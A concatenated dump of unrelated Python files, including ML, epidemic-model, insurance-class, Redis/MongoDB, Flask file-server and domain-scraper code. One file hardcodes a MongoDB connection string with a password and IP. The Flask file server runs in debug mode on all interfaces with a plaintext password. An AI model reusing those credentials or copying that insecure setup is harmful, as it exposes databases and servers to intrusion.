0)\n\nextractGnuTime(\"run__detailedroute\",logPath+\"/5_2_TritonRoute.log\")\n\n# Finish\n# ==============================================================================\n\nextractTagFromFile(\"finish__power__internal__total\",\n \"Total +(\\S+) +\\S+ +\\S+ +\\S+ +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__power__switch__total\",\n \"Total +\\S+ +(\\S+) +\\S+ +\\S+ +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__power__leak__total\",\n \"Total +\\S+ +\\S+ +(\\S+) +\\S+ +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__power__total\",\n \"Total +\\S+ +\\S+ +\\S+ +(\\S+) +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__area\",\n \"^Design area (\\S+ \\S+)\",\n rptPath+\"/6_final_report.rpt\")\nextractTagFromFile(\"finish__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/6_final_report.rpt\")\n\nextractGnuTime(\"run__report\",logPath+\"/6_report.log\")\n\nextractGnuTime(\"run__merge\",logPath+\"/6_1_merge.log\")\n\n\nextractTagFromFile(\"drc_klayout_viols\",\n \"\",\n rptPath+\"/6_drc_count.rpt\", -2, 0, t=int)\n\n\n# Accumulate time\n# ==============================================================================\n\nfailed = False\ntotal = datetime.timedelta()\nfor key in jsonFile:\n if key.endswith(\"_time\"):\n # Big try block because Hour and microsecond is optional\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%H:%M:%S.%f\")\n except ValueError:\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%M:%S.%f\")\n except ValueError:\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%H:%M:%S\")\n except ValueError:\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%M:%S\")\n except ValueError:\n failed = True\n break\n\n delta = datetime.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)\n total += delta\n\nif failed:\n jsonFile[\"total_time\"] = \"ERR\"\nelse:\n jsonFile[\"total_time\"] = str(total)\n\n# print json.dumps(jsonFile, indent=2)\nwith open(args.output, \"w\") as resultSpecfile:\n json.dump(jsonFile, resultSpecfile, indent=2)\n","sub_path":"flow/util/genMetadata.py","file_name":"genMetadata.py","file_ext":"py","file_size_in_byte":17361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486556683","text":"import math, collections\npowerSet = 6\nlistLabel = ['toxic','severe_toxic','obscene','threat','insult','identity_hate']\n\nclass UnigramLanguageModel:\n\n def __init__(self, corpus):\n self.unigramCounts = [collections.defaultdict(lambda: 0) for i in range(7)] \n self.nonInUnigramCounts = [collections.defaultdict(lambda: 0) for i in range(7)] \n self.totalYes = [0 for i in range(7)]\n self.totalNo = [0 for i in range(7)]\n self.p_label = [0 for i in range(7)]\n self.N = 13000 # estimate total number of words (including unknown words)\n self.ukp = 0.05\n self.train(corpus)\n\n def train(self, corpus):\n for index in range(min(1000, len(corpus['comment_text']))):\n \n if (index % 1000) == 0: \n print(index/1000)\n sentence = corpus['comment_text'][index]\n self.p_label[6] += 1\n for column in range(0, len(listLabel)):\n label = listLabel[column]\n if corpus[label][index] == 1:\n self.p_label[column] += 1\n for token in sentence:\n \n \n if corpus[label][index] == 1:\n self.unigramCounts[column][token] += 1\n self.totalYes[column] += 1\n else:\n self.nonInUnigramCounts[column][token] += 1\n self.totalNo[column] += 1\n \n for i in range(6):\n self.p_label[i] = max(float(self.p_label[i]) / self.p_label[6], 0.000005)\n print(self.p_label)\n \n def score(self, sentence):\n YesScore = [0.0 for i in range(powerSet)]\n NoScore = [0.0 for i in range(powerSet)]\n for i in range(0, len(listLabel)):\n label = listLabel[i]\n for token in sentence:\n countYes = self.unigramCounts[i][token]\n countNo = self.nonInUnigramCounts[i][token]\n if (countYes != 0):\n yesPro = (1.0 - self.ukp) * (float(countYes) / float(self.totalYes[i]+self.N)) + self.ukp * (1.0 / float(self.N))\n else:\n yesPro = self.ukp * (1.0 / float(self.N + self.totalYes[i]))\n\n if (countNo != 0):\n noPro = (1.0 - self.ukp) * (float(countNo) / float(self.totalNo[i]+self.N)) + self.ukp * (1.0 / float(self.N))\n else:\n noPro = self.ukp * (1.0 / float(self.N + self.totalNo[i]))\n \n \n YesScore[i] += math.log(yesPro)\n NoScore[i] += math.log(noPro)\n\n YesScore[i] += math.log(self.p_label[i])\n NoScore[i] += math.log(1.0 - self.p_label[i])\n \n \n maxLabel = [0 for i in range(powerSet)]\n for i in range(0, powerSet):\n if (YesScore[i] > NoScore[i]):\n maxLabel[i] = 1\n \n return maxLabel\n","sub_path":"model/binary-bayesian/UnigramLanguageModel.py","file_name":"UnigramLanguageModel.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"322752055","text":"from types import MappingProxyType\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy import integrate\n\n\nclass ModelMeta(type):\n \"\"\"\n Meta class for model types.\n\n Reset the EXAMPLES dictionary for each sub-model.\n \"\"\"\n\n def __init__(cls, name, bases, ns):\n try:\n ns['EXAMPLES'] = MappingProxyType(ns['EXAMPLES'])\n except KeyError:\n pass\n\n super().__init__(name, bases, ns)\n\n\nclass Model(metaclass=ModelMeta):\n \"\"\"\n Base class for all Epidemic models.\n \"\"\"\n EXAMPLES = MappingProxyType({})\n PERIOD = 365.25 / 12\n MAX_PERIOD = 5 * 365.25\n STEPS = 30\n X_TOL = 0.1\n x0 = None\n columns = None\n sub_groups = ()\n\n @classmethod\n def main(cls, *args, **kwargs):\n \"\"\"\n Executes the default action for the model. Convenient for making quick\n and dirt CLI tools.\n \"\"\"\n m = cls(*args, **kwargs)\n run = m.run()\n print(run)\n run.plot()\n plt.show()\n return m, run\n\n def __init__(self, *args, **kwargs):\n if args:\n key, = args\n default = self.EXAMPLES[key]\n kwargs = {**default, **kwargs}\n\n for k, v in kwargs.items():\n if hasattr(self, k):\n setattr(self, k, v)\n else:\n raise TypeError(f'invalid argument: {k}')\n if 'display_columns' not in kwargs:\n self.display_columns = self.columns\n\n def diff(self, x, t):\n \"\"\"\n Derivative function for state.\n \"\"\"\n raise NotImplementedError('implement in subclass')\n\n def has_converged(self, times, xs):\n \"\"\"\n Read a sequence of times and a sequence of states and conclude if\n simulation has already converged to a steady state.\n \"\"\"\n if len(times) > 2000:\n return True\n if times[-1] >= self.MAX_PERIOD:\n return True\n if (np.abs(xs[-1] - xs[-2]) < self.X_TOL / self.STEPS).all() \\\n and self.has_burst(times, xs):\n return True\n return False\n\n def has_burst(self, times, xs):\n \"\"\"\n Read a sequence of times and a sequence of states and conclude if\n simulation has already experienced or is experiencing an epidemic burst.\n\n It returns False only when it is likely that the burst has not yet\n happened.\n \"\"\"\n return xs.std(1).max() > 100 * self.X_TOL\n\n def trim_to_burst(self, times, xs):\n \"\"\"\n Find the epidemic peak and trim datasets to be around this peak.\n \"\"\"\n tol = 0.1 * xs.std(1)\n x0 = xs[0]\n xf = xs[-1]\n\n i = 0\n for x in xs:\n if np.abs(x - x0) > tol:\n break\n i += 1\n\n j = len(xs)\n for x in reversed(xs):\n j -= 1\n if np.abs(x - xf) > tol:\n break\n\n return times[i:j], xs[i:j]\n\n def run(self) -> 'Run':\n \"\"\"\n Run simulation until dynamics can be considered to be resolved.\n \"\"\"\n time = 0.0\n x = self.x0\n dt = self.PERIOD\n steps = self.STEPS\n times = np.array([time], dtype=float)\n xs = np.array([x], dtype=float)\n\n while True:\n times_, xs_ = self._run_interval(dt, time, x, steps)\n times = np.concatenate([times, times_[1:]])\n xs = np.concatenate([xs, xs_[1:]])\n time = times[-1]\n x = xs[-1]\n\n if self.has_converged(times, xs):\n break\n\n return self._to_result(times, xs)\n\n def run_interval(self, dt, t0=0, x0=None, steps=100) -> 'Run':\n \"\"\" == 1\n Run simulation by given interval\n \"\"\"\n return self._to_result(*self._run_interval(dt, t0, x0, steps))\n\n def _run_interval(self, dt, t0, x0, steps):\n x0 = self.x0 if x0 is None else x0\n times = np.linspace(t0, t0 + dt, steps)\n ys = integrate.odeint(self.diff, x0, times)\n return times, ys\n\n def _to_result(self, times, ys) -> 'Run':\n cls = getattr(self, 'run_class', Run)\n return cls(self._to_dataframe(times, ys), self)\n\n def _to_dataframe(self, times, ys) -> pd.DataFrame:\n if self.sub_groups:\n names = 'column', 'age'\n columns = pd.MultiIndex.from_product((self.columns, self.sub_groups), names=names)\n else:\n columns = self.columns\n df = pd.DataFrame(ys, columns=columns)\n df.index = times\n return df\n\n def summary(self, run):\n \"\"\"\n Return a summary string for the given run. Used by run instances to\n perform string conversion.\n \"\"\"\n dic = self.summary_map(run)\n keys = dic.keys()\n size = max(map(len, keys))\n keys = map(lambda x: x.ljust(size), keys)\n values = map(str, dic.values())\n return '\\n'.join(f'{k} : {v}' for k, v in zip(keys, values))\n\n def summary_map(self, run):\n \"\"\"\n Convenient access to summary data as a dictionary. Useful for\n subclasses to avoid excessive string formatting operations when\n implementing the summary() method..\n \"\"\"\n raise NotImplementedError('must be implemented in subclasses')\n\n def get_data(self, df, name):\n \"\"\"\n Returns pre-processed from dataframe. Subclasses might implement methods\n such as get_data_ to handle specific names.\n \"\"\"\n try:\n method = getattr(self, f'get_data_{name}')\n except AttributeError:\n return df[name]\n else:\n return method(df)\n\n\nclass Run:\n \"\"\"\n Represents an execution of the model.\n \"\"\"\n values = property(lambda self: self.data.values)\n\n def __init__(self, data, model):\n self.data = data\n self.model = model\n\n def __str__(self):\n return self.model.summary(self)\n\n def __getattr__(self, item):\n try:\n return self.model.get_data(self.data, item)\n except ValueError:\n raise AttributeError(item)\n\n def plot(self, show=False):\n res = self.data[self.model.display_columns].plot()\n if show:\n plt.show()\n else:\n return res\n","sub_path":"covid/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16048380","text":"import uuid\r\n\r\n# Represents the customer of the car insurance company\r\nclass Customer:\r\n def __init__(self, name, address):\r\n self.ID= str(uuid.uuid1())\r\n self.name = name\r\n self.address = address\r\n self.cars = [] #objects\r\n self.agent = [] #one agent per customer only ID because of comment below\r\n self.claims = [] #objects\r\n self.payments = [] #objects\r\n\r\n def addCar (self, car):\r\n self.cars.append(car)\r\n\r\n\r\n def addAgent(self,agent):\r\n if len(self.agent) == 0:\r\n #!!! Can only implement ID not the whole agent object because agent and customer object\r\n # would reference each other and that causes the serialization to throw recursion errors\r\n # which Im not able solve\r\n self.agent = agent.ID\r\n return True\r\n else:\r\n return False\r\n\r\n def addClaim(self, claim):\r\n if len(self.agent) != 0:\r\n self.claims.append(claim)\r\n return True\r\n else:\r\n return False\r\n\r\n def addPayment(self, payment):\r\n self.payments.append(payment)\r\n\r\n # convert object o JSON\r\n def serialize(self):\r\n return {\r\n 'id': self.ID, \r\n 'name': self.name, \r\n 'address': self.address,\r\n #nested serialization as a list comprehension for car objects necessary\r\n 'cars': [car.serialize() for car in self.cars],\r\n 'agent': self.agent,\r\n ### cannot implement that due to recursion issues\r\n #'agent': [a.serialize() for a in self.agent]\r\n 'claims': [claim.serialize() for claim in self.claims],\r\n 'payments': [payment.serialize() for payment in self.payments]\r\n }\r\n \r\nclass Car :\r\n def __init__(self, model_name, number_plate, motor_power, year):\r\n self.name = model_name\r\n self.number_plate = number_plate\r\n self.motor_power = motor_power\r\n self.year = year\r\n self.owner = [] #ID due to recursion error\r\n\r\n def setOwner(self, owner):\r\n self.owner = owner.ID\r\n\r\n # convert object o JSON\r\n def serialize(self):\r\n return {\r\n 'model': self.name,\r\n 'numberplate': self.number_plate,\r\n 'motor power': self.motor_power,\r\n 'manufacturing year': self.year,\r\n ### cannot implement that due to recursion issues\r\n #'owner': [c.serialize() for c in self.owner]\r\n 'owner': self.owner\r\n }\r\n\r\nclass Claim:\r\n def __init__(self, date, incident_description, claim_amount):\r\n self.ID = str(uuid.uuid1())\r\n self.date = date\r\n self.incident_description = incident_description\r\n self.claim_amount = claim_amount\r\n self.status = None\r\n self.approved_amount = None\r\n self.responsible_agent = [] # ID only\r\n self.applicant = [] # ID only\r\n\r\n def setAgent(self, agent):\r\n self.responsible_agent = agent.ID\r\n\r\n def setApplicant(self, applicant):\r\n self.applicant = applicant.ID\r\n\r\n def evaluateStatus(self, amount):\r\n if self.approved_amount == None:\r\n self.approved_amount = amount\r\n if self.approved_amount >= self.claim_amount:\r\n self.status = \"FULLY COVERED\"\r\n elif self.approved_amount <= 0:\r\n self.status = \"REJECTED\"\r\n else:\r\n self.status = \"PARTLY COVERED\"\r\n return True\r\n else:\r\n return False\r\n\r\n # convert object to JSON\r\n def serialize(self):\r\n return {\r\n 'id': self.ID,\r\n 'date': self.date,\r\n 'incident_description': self.incident_description,\r\n 'claim_amount': self.claim_amount,\r\n 'status' : self.status,\r\n 'approved_amount' : self.approved_amount,\r\n 'responsible_agent': self.responsible_agent,\r\n 'applicant': self.applicant\r\n }\r\n\r\nclass Payment:\r\n def __init__(self,date):\r\n self.ID = str(uuid.uuid1())\r\n self.date = date\r\n\r\nclass Revenue(Payment):\r\n def __init__(self, date, customer_id, amount_received):\r\n Payment.__init__(self, date)\r\n self.customer_id = customer_id\r\n self.amount_received = amount_received\r\n\r\n def serialize(self):\r\n return {\r\n 'id': self.ID,\r\n 'date': self.date,\r\n 'customer_id': self.customer_id,\r\n 'amount_received': self.amount_received\r\n }\r\n\r\nclass Expense(Payment):\r\n def __init__(self, date, agent_id, amount_sent):\r\n Payment.__init__(self, date)\r\n self.agent_id = agent_id\r\n self.amount_sent = amount_sent\r\n\r\n def serialize(self):\r\n return {\r\n 'id': self.ID,\r\n 'date': self.date,\r\n 'agent_id': self.agent_id,\r\n 'amount_sent': self.amount_sent\r\n }\r\n\r\n","sub_path":"Customer.py","file_name":"Customer.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175991072","text":"import pyvinecopulib as pvcl\nimport numpy as np\n\nn = 100\n\nbcp = pvcl.bicop(pvcl.gaussian, 0, np.array([[.5]]))\nsim_data = bcp.simulate(n)\nll = bcp.loglik(sim_data)\n\nassert type(ll) == float\n","sub_path":"tests/unit/bicop_loglik.py","file_name":"bicop_loglik.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"44688674","text":"# -*- coding: utf-8 -*-\nimport redis\nimport json\nimport random\nimport time\nfrom pymongo import MongoClient\n\nuri = 'mongodb://imooc1:imooc1@119.23.207.42:27017/imooc'\nconn = MongoClient(uri)\ndb = conn.get_database('imooc')\ninfoTable = db.dzdp_info_hub_ceshi_1 # 存店铺信息\n\n# 常量\nQUEUE_NAME = 'dzdp_info'\n\n\ndef redis_t_1():\n r = redis.Redis(host='localhost', port=6379, decode_responses=True) # host是redis主机,需要redis服务端和客户端都启动 redis默认端口是6379\n r.set('name', 'junxi') # key是\"foo\" value是\"bar\" 将键值对存入redis缓存\n print(r['name'])\n print(r.get('name')) # 取出键name对应的值\n print(type(r.get('name')))\n\n\nredisPool = redis.ConnectionPool(host='localhost', port=6379, db=8)\nclient = redis.Redis(connection_pool=redisPool)\n\n\ndef put_data():\n for i in infoTable.find():\n push_data(i)\n time_sleep = random.randint(1, 10)\n time.sleep(time_sleep)\n print(i)\n\n\ndef get_data():\n while True:\n print(pop_data())\n\n\ndef push_data(json_data):\n client.rpush(QUEUE_NAME, json_data['shop_id'])\n\n\ndef pop_data():\n while True:\n try:\n data_json = client.lpop(QUEUE_NAME)\n time.sleep(random.randint(1, 10))\n return data_json\n except Exception as e:\n data_json = None\n if data_json is None:\n return\n\n\nif __name__ == '__main__':\n # put_data()\n get_data()\n\n","sub_path":"notes/redis/redis/redis_demo2.py","file_name":"redis_demo2.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"21263704","text":"#!/usr/bin/env python\n\nPACKAGE = 'casper_sensors'\nimport roslib;roslib.load_manifest(PACKAGE)\nimport rospy\n\nimport dynamic_reconfigure.client\n\ntop_configured = False\nbottom_configured = False\n\ndef top_callback(config):\n \n global top_configured\n if config.ir_mode == config.color_mode == config.depth_mode == 8:\n rospy.logwarn(\"Top_camera running in QVGA\")\n top_configured = True\n else:\n rospy.loginfo(\"Configuring top_camera...\")\n\ndef bottom_callback(config):\n\n global bottom_configured\n if config.ir_mode == config.color_mode == config.depth_mode == 8:\n rospy.logwarn(\"Bottom_camera running in QVGA\")\n bottom_configured = True\n else:\n rospy.loginfo(\"Configuring bottom_camera...\")\n\nif __name__ == \"__main__\":\n rospy.init_node(\"openni2_config_client\")\n\n top_camera_client = dynamic_reconfigure.client.Client(\"casper_top_camera/driver\", timeout=30, config_callback=top_callback)\n bottom_camera_client = dynamic_reconfigure.client.Client(\"casper_bottom_camera/driver\", timeout=30, config_callback=bottom_callback)\n\n while not (rospy.is_shutdown() or (top_configured and bottom_configured)):\n if not top_configured:\n top_camera_client.update_configuration({\"ir_mode\":8, \"color_mode\":8, \"depth_mode\":8})\n if not bottom_configured: \n bottom_camera_client.update_configuration({\"ir_mode\":8, \"color_mode\":8, \"depth_mode\":8})\n","sub_path":"src/casper_sensors/src/openni2_config.py","file_name":"openni2_config.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"254793839","text":"import fresh_tomatoes\nimport media\n\n# Load each movie object statically\ncontact = media.Movie(\"Contact\",\n \"Dr. Ellie Arroway (Jodie Foster) works for the Search\"\n \" for Extraterrestrial Intelligence (SETI) program...\",\n \"http://www.gstatic.com/tv/thumb/movieposters/19587/p19587_p_v8_ab.jpg\",\n \"https://www.youtube.com/watch?v=SRoj3jK37Vc\")\n\nthe_dark_night = media.Movie(\"The Dark Night\",\n \"With the help of allies Lt. Jim Gordon (Gary\"\n \" Oldman) and DA Harvey Dent (Aaron Eckhart),\"\n \" Batman (Christian Bale) has been able to keep\"\n \" a tight lid on crime in Gotham City. But when\" \n \" a vile young criminal calling himself the\"\n \" Joker (Heath Ledger) suddenly throws the town\"\n \" into chaos, the caped Crusader begins to tread\"\n \" a fine line between heroism and vigilantism.\",\n \"http://www.gstatic.com/tv/thumb/movieposters/173378/p173378_p_v8_aa.jpg\",\n \"https://www.youtube.com/watch?v=EXeTwQWrcwY\")\n\nstar_trek_first_contact = media.Movie(\"Star Trek: First Contact\",\n \"The Enterprise and its crew follow a\"\n \" Borg ship through a time warp to\"\n \" prevent the Borg from taking over the\"\n \" Earth in a past era. Stuck in the past,\"\n \" Geordi La Forge (LeVar Burton) helps a\"\n \" pioneer of space travel (James\"\n \" Cromwell) in his efforts to create the\"\n \" first warp drive while Capt. Picard\"\n \" (Patrick Stewart) and Cmdr. Data (Brent\"\n \" Spiner) battle the Borg Queen (Alice\"\n \" Krige) as she tries to take over the \"\n \" Enterprise.\",\n \"http://t2.gstatic.com/images?q=tbn:ANd9GcQqKE15EvuPYXqFa5X1PWPlljp1pu5Ss1UUNS98qp8RkJnSBSUU\",\n \"https://www.youtube.com/watch?v=YQ1eiEvefKI\")\n\ninterstellar = media.Movie(\"Interstellar\",\n \" In Earth's future, a global crop blight and second\"\n \" Dust Bowl are slowly rendering the planet\"\n \" uninhabitable. Professor Brand (Michael Caine), a\"\n \" brilliant NASA physicist, is working on plans to\"\n \" save mankind by transporting Earth's population to\"\n \" a new home via a wormhole. But first, Brand must\"\n \" send former NASA pilot Cooper (Matthew\"\n \" McConaughey) and a team of researchers through the\"\n \" wormhole and across the galaxy to find out which\"\n \" of three planets could be mankind's new home.\",\n \"http://t1.gstatic.com/images?q=tbn:ANd9GcRf61mker2o4KH3CbVE7Zw5B1-VogMH8LfZHEaq3UdCMLxARZAB\",\n \"https://www.youtube.com/watch?v=nyc6RJEEe0U\")\n\nthe_departed = media.Movie(\"The Departed\",\n \"South Boston cop Billy Costigan (Leonardo DiCaprio)\"\n \" goes under cover to infiltrate the organization of\"\n \" gangland chief Frank Costello (Jack Nicholson). As\"\n \" Billy gains the mobster's trust, a career criminal\"\n \" named Colin Sullivan (Matt Damon) infiltrates the\"\n \" police department and reports on its activities to\"\n \" his syndicate bosses. When both organizations\"\n \" learn they have a mole in their midst, Billy and\"\n \" Colin must figure out each other's identities to\"\n \" save their own lives.\",\n \"http://www.gstatic.com/tv/thumb/movieposters/162564/p162564_p_v8_ag.jpg\",\n \"https://www.youtube.com/watch?v=iQpb1LoeVUc\")\n\nsunshine = media.Movie(\"Sunshine\",\n \"In the not-too-distant future, Earth's dying sun spells\"\n \" the end for humanity. In a last-ditch effort to save\"\n \" the planet, a crew of eight men and women ventures\"\n \" into space with a device that could revive the star.\"\n \" However, an accident, a grave mistake and a distress\"\n \" beacon from a long-lost spaceship throw the crew and\"\n \" its desperate mission into a tailspin.\",\n \"http://www.gstatic.com/tv/thumb/movieposters/161586/p161586_p_v8_aa.jpg\",\n \"https://www.youtube.com/watch?v=r8BSlqHAhuY\")\n\n# Place movies objects into a list for display\nmovies = [contact, the_dark_night, the_departed, interstellar, \n star_trek_first_contact, sunshine]\n\n# Generate a webpage based on the list\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"generate_site_static.py","file_name":"generate_site_static.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"443585890","text":"from flask import Flask, render_template, request, send_file, redirect, session\nimport os\nimport sys\nimport json\n\napp = Flask(__name__)\napp.secret_key = 'my_secret_key'\n#currentDirectory='/Users/rehan/Downloads'\n\nwith open('config.json') as json_data_file:\n data = json.load(json_data_file)\nhiddenList = data[\"Hidden\"]\nfavList = data[\"Favorites\"]\npassword = data[\"Password\"]\ncurrentDirectory=data[\"rootDir\"]\n\n\nif(len(favList)>3):\n favList=favList[0:3]\n\nfor i in range(0,3):\n favList[i]=favList[i].replace('/','>')\n\n\n\n@app.route('/login/')\ndef loginMethod():\n global password\n if(password==''):\n session['login'] = True\n\n\n if('login' in session):\n return redirect('/')\n else:\n return render_template('login.html')\n\n\n@app.route('/login/', methods=['POST'])\ndef loginPost():\n global password\n\n text = request.form['text']\n if(text==password):\n session['login'] = True\n\n return redirect('/')\n else:\n return redirect('/login/')\n\n@app.route('/logout/')\ndef logoutMethod():\n if('login' in session):\n session.pop('login',None)\n return redirect('/login/')\n \n#@app.route('/exit/')\n#def exitMethod():\n# exit()\n\n\n\n\ndef hidden(path):\n\n for i in hiddenList:\n if i != '' and i in path:\n return True\n \n return False\n\n\n\ndef changeDirectory(path):\n global currentDirectory\n\n pathC = path.split('>')\n \n if(pathC[0]==\"\"):\n pathC.remove(pathC[0])\n \n myPath = currentDirectory+'/'+'/'.join(pathC)\n #print(myPath)\n try:\n os.chdir(myPath)\n ans=True\n if(currentDirectory not in os.getcwd()):\n ans = False\n except:\n ans=False\n \n \n\n return ans\n \ndef getDirList():\n\n\n dList= list(filter(lambda x: os.path.isdir(x), os.listdir('.')))\n finalList = []\n curDir=os.getcwd()\n\n for i in dList:\n if(hidden(curDir+'/'+i)==False):\n finalList.append(i)\n\n return(finalList)\n\n\ndef getFileList():\n\n dList = list(filter(lambda x: os.path.isfile(x), os.listdir('.')))\n\n finalList = []\n curDir=os.getcwd()\n\n for i in dList:\n if(hidden(curDir+'/'+i)==False):\n finalList.append(i)\n\n return(finalList)\n\n\n\n\n\n\n@app.route('/', methods=['GET'])\ndef filePage(var):\n if('login' not in session):\n return redirect('/login/')\n \n if(changeDirectory(var)==False):\n #Invalid Directory\n print(\"Directory Doesn't Exist\")\n return render_template('404.html',errorCode=300,errorText='Invalid Directory Path',favList=favList)\n \n try:\n dirList = getDirList()\n fileList = getFileList()\n except:\n return render_template('404.html',errorCode=200,errorText='Permission Denied',favList=favList)\n\n\n return render_template('home.html',dirList=dirList,fileList=fileList,currentDir=var,favList=favList)\n\n@app.route('/', methods=['GET'])\ndef homePage():\n global currentDirectory\n if('login' not in session):\n return redirect('/login/')\n \n\n\n os.chdir(currentDirectory)\n dirList = getDirList()\n fileList=getFileList()\n return render_template('home.html',dirList=dirList,fileList=fileList,currentDir=\"\",favList=favList)\n\n\n@app.route('/download/')\ndef downloadFile(var):\n global currentDirectory\n if('login' not in session):\n return redirect('/login/')\n \n #os.chdir(currentDirectory)\n\n pathC = var.split('>')\n if(pathC[0]==''):\n pathC.remove(pathC[0])\n \n fPath = '/'.join(pathC)\n fPath=currentDirectory+'/'+fPath\n \n if(hidden(fPath)):\n #FILE HIDDEN\n return render_template('404.html',errorCode=100,errorText='File Hidden',favList=favList)\n\n\n fName=pathC[len(pathC)-1]\n #print(fPath)\n try:\n return send_file(fPath, attachment_filename=fName)\n except:\n return render_template('404.html',errorCode=200,errorText='Permission Denied',favList=favList)\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n if('login' not in session):\n return redirect('/login/')\n \n # note that we set the 404 status explicitly\n return render_template('404.html',errorCode=404,errorText='Page Not Found',favList=favList), 404\n\n\n\nif __name__ == '__main__':\n app.run(host= '0.0.0.0',debug=True)","sub_path":"setupMac.py","file_name":"setupMac.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"420552820","text":"from bs4 import BeautifulSoup\nfrom requests import utils\nimport os\nimport pandas as pd\nimport pickle\nfrom urllib import parse\nimport time\n\nfrom django.conf import settings\n\nfrom common.session import Session\n\n\nclass ExpiredDomains(Session):\n USE_PROXY = True\n NAME = 'expireddomains'\n TIMEOUT = 10\n BASE_URL = 'https://member.expireddomains.net/'\n LOGIN_URL = BASE_URL + 'login/'\n GET_URL = BASE_URL + 'domains/expiredcom{date}'\n COLUMN_URL = BASE_URL + 'account/columnmanager/'\n TRIES_COUNT = 30\n SLEEP_TIME = 5\n MAX_PAGES = 600\n PARAMS = {\n 'start': 0,\n 'ftlds[]': 2,\n 'flimit': 200,\n 'fonlycharhost': 1,\n 'fwordcountmin': 2,\n 'fwordcountmax': 2,\n 'fworden': 1,\n 'fstatuscomfree': 22,\n }\n REFRESH_TIME = 4 * 60\n OUTPUT_FILE = os.path.join(settings.DOWNLOADS, NAME + '.csv')\n viewfields = ['abirth', 'aentries', 'statuscom', 'statusnet', 'statusorg',\n 'statusbiz', 'statusinfo', 'statusde', 'searchesglobal',\n 'competition', 'acpc', 'statusus', 'statusca', 'statusuk',\n 'statusco_uk', 'statuseu', 'statuscom_au', 'statusin',\n 'statusco_in', 'statusat', 'statusch', 'statusbe', 'statusnl',\n 'statusdk', 'statusfr', 'statuspl', 'statuses', 'statuspt',\n 'statusit', 'statusme', 'statustv', 'statusio', 'statuscn',\n 'statusru']\n keys = ['Domain', 'ABY', 'ACR', 'C', 'N', 'O', 'B', 'I', 'D', 'SG',\n 'CPC', 'Add Date', 'US', 'CA', 'UK', 'CO.UK', 'CO', 'EU', 'COM.AU',\n 'IN', 'CO.IN', 'AT', 'CH', 'BE', 'NL', 'DK', 'FR', 'PL', 'ES',\n 'PT', 'IT', 'ME', 'TV', 'IO', 'CN', 'RU']\n\n def __init__(self, login=True):\n headers = {\n 'User-Agent': settings.USER_AGENT,\n }\n # proxies = settings.TOR_PROXIES\n super().__init__(headers=headers)\n fname = self.NAME + '.cookies'\n self.cookies_file = os.path.join(settings.KEYS, fname)\n fname = self.NAME + '.lst'\n self.keys_file = os.path.join(settings.KEYS, fname)\n self.DATA = settings.EXPIREDDOMAINS\n self.start_time = int(time.time())\n self.next_refresh_time = self.start_time + self.REFRESH_TIME\n if login:\n self.login(force=True) # Need to login first\n\n def get_all(self):\n years = range(2006, 2018)\n months = range(1, 13)\n\n total_added_count = 0\n c = 0\n for year in years:\n for month in months:\n if year == 2006 and month == 1:\n continue\n date = '%d%.2d' % (year, month)\n self.info('About to add for date: %s' % (date))\n total_added_count += self.get(c, date)\n c += 1\n\n self.info('Total %d domains added' % (total_added_count))\n\n return total_added_count\n\n def get(self, c, date):\n start = 0\n url = self.GET_URL.format(date=date)\n session = self.session\n\n added_count = 0\n\n res = {}\n order = {}\n for key in self.keys:\n res[key] = []\n order[key] = 1\n\n res_ = res\n\n for i_ in range(self.MAX_PAGES):\n params = self.PARAMS\n params['start'] = start\n for i in range(self.TRIES_COUNT):\n self.info('About to request...')\n try:\n r = session.get(url, params=params)\n self.info('Got response...')\n except Exception as e:\n self.warn('Error:')\n self.warn(e)\n continue\n if not r:\n self.warn('Error! Not r')\n self.login()\n continue\n if 'Sign Up' in r.text:\n self.warn('Need to relogin')\n self.login()\n else:\n soup = BeautifulSoup(r.content, 'lxml')\n table = soup.find('table', {'class': 'base1'})\n\n if table is None:\n break\n\n headers = table.find('thead').find_all('th')\n pos_ = 0\n for header in headers:\n k = header.get_text().strip()\n if k in self.keys:\n order[k] = pos_\n pos_ += 1\n\n rows = table.find('tbody').find_all('tr')\n if len(rows) < 1:\n break\n\n pos_ = 0\n for row in rows:\n data = row.find_all('td')\n for key, idx in order.items():\n try:\n k = data[idx].get_text().strip()\n if key in ['Domain']:\n k = data[idx].find('a')['title'].strip()\n res[key].append(k)\n except:\n res[key].append('')\n added_count += 1\n start += 200\n self.info('Start: %d: %d more added...' % (start,\n added_count))\n current_time = int(time.time())\n if current_time > self.next_refresh_time:\n self.info('Login refresh time...')\n self.next_refresh_time = current_time + 